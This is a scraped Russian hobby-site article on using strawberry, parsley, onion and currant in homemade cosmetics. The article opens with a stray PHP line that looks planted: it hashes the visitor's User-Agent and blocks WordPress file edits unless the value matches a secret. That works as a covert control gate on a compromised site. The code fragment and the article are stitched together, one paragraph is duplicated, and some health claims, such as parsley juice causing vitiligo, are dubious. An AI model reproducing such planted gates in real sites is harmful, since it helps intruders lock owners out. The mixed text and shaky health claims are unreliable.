if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Секреты использования клубники, петрушки, лука и смородины в домашней косметике | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Секреты использования клубники, петрушки, лука и смородины в домашней косметике

Для нас уход за кожей лица является важной процедурой на каждый день. Мы очень тщательно следим за своей кожей лица и используем специальные маски для лица - тонизирующие, и очищающие и увлажняющие; тоники, крема, пилинги и т.д.

Для нас уход за кожей лица явля­ет­ся важ­ной про­це­ду­рой на каж­дый день. Мы очень тща­тель­но сле­дим за сво­ей кожей лица и исполь­зу­ем спе­ци­аль­ные мас­ки для лица — тони­зи­ру­ю­щие, и очи­ща­ю­щие и увлаж­ня­ю­щие; тони­ки, кре­ма, пилин­ги и т.д. Но те из нас, кто любит все нату­раль­ное, дол­жен знать и об осо­бен­но­стях домаш­ней кос­ме­ти­ки, сде­лан­ной сво­и­ми руками.

Клубника в домашней косметике

klubnika11

Мно­гие часто исполь­зу­ют мас­ку из клуб­ни­ки. Но у это­го про­дук­та при непра­виль­ном исполь­зо­ва­нии есть свой минус. При нане­се­нии све­жей клуб­ни­ки на лицо, в виде мас­ке, нуж­но знать то, что такую мас­ку нель­зя дер­жать более 10 минут. Ина­че, у вас может появить­ся зуд и крас­но­та на коже в местах ее нане­се­ния. Это про­ис­хо­дит из-за того, что в клуб­ни­ке содер­жит­ся высо­кое коли­че­ство раз­лич­ных орга­ни­че­ских кис­лот. Что­бы предот­вра­тить раз­дра­же­ние кожи, сме­шай­те клуб­ни­ку с жир­ной осно­вой и обой­де­тесь без каких-либо последствий.

Особенности использования петрушки в уходе за лицом

петрушка обычн

Мно­гие девуш­ки стал­ки­ва­лись с про­блем­ны­ми меш­ка­ми под гла­за­ми. Такие оте­ки мож­но снять с помо­щью настоя из пет­руш­ки. Но, не все так про­сто. Если же вы про­сто выпье­те ее сок, вме­сто при­моч­ки 🙂 вы не умре­те, но може­те покрыть­ся пят­на­ми или вити­ли­го. Жела­тель­но, конеч­но, смо­чить ват­ный диск соком пет­руш­ки и при­ло­жить на гла­за — вме­сте с отте­ком уйдет и вся вла­га, кото­рая нахо­ди­лась в коже вокруг глаз. Для того, что­бы оста­вить вашу кожу вокруг глаз целой и не обез­во­жен­ной, вам нуж­но делать пат­чи, кото­рые состо­ят из сока пет­руш­ки и олив­ко­во­го мас­ла. Бла­го­да­ря мас­лу, ваша кожа вокруг глаз будет смяг­чать­ся, и увлажняться.

Как безопасно использовать лук в маске для волос

7394558

Для мно­гих деву­шек и жен­щин, уход за воло­са­ми явля­ет­ся важ­ной частью их жиз­ни. Открою малень­кий сек­рет: уха­жи­вать за воло­са­ми мож­но с помо­щью обыч­но­го реп­ча­то­го лука. Но в такой мас­ке для волос есть и свои мину­сы — это запах, кото­рый появ­ля­ет­ся после мытья волос если вы исполь­зу­е­те луко­вый сок. Даже обыч­ный шам­пунь не помо­жет побо­роть этот запах. Вто­рая осо­бен­ность — если же вы пере­дер­жи­те мас­ку из лука, то може­те убить все полез­ные бак­те­рии, кото­рые нахо­дят­ся на коже голо­вы, тем самым нару­ши­те рабо­ту саль­ных желез головы.

Для без­опас­но­го при­ме­не­ния вам нуж­но сме­шать сок реп­ча­то­го лука, репей­но­го мас­ла, яич­но­го желт­ка, две кап­ли мас­ла роз­ма­ри­на, две кап­ли мас­ла шал­фея. После того, как вы про­хо­ди­те с такой мас­кой для волос пол­ча­са, смой­те ее горя­чей водой с экс­трак­том чай­но­го дере­ва. Тогда, ваши воло­сы будут кра­си­вы­ми и шел­ко­ви­сты­ми, а от запа­ха не будет и следа.

 

Бережный пилинг с добавлением смородины

article32758

Пилинг из смо­ро­ди­ны име­ет мно­же­ство плю­сов — береж­ный, с нату­раль­ны­ми ком­по­нен­та­ми, дела­ет кожу бар­хат­ной. Но у него есть один минус — он может вызы­вать аллер­гию или раз­дра­же­ние на коже лица. Для того, что­бы это­го не слу­чи­лось, вам нуж­но сме­шать чер­ную смо­ро­ди­ну с мукой и грец­ки­ми оре­ха­ми, после чего эта смесь будет вам напо­ми­нать без­опас­ный скраб.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!